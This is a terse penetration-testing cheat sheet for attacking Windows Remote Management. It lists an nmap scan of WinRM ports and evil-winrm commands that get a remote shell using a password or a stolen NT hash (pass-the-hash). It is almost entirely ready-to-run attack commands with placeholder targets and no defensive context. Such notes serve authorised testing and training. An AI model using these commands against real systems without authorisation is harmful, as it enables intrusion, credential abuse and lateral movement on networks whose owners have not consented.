Windows Remote Management (WinRM) enumeration and exploitation Initial enumeration Reverse shells Initial enumeration nmap -vv -p 5985,5986 -sT <ip> Reverse shells evil-winrm -i <ip> -u <username> -p <password> evil-winrm -i <ip> -u <username> -H <nt_hash>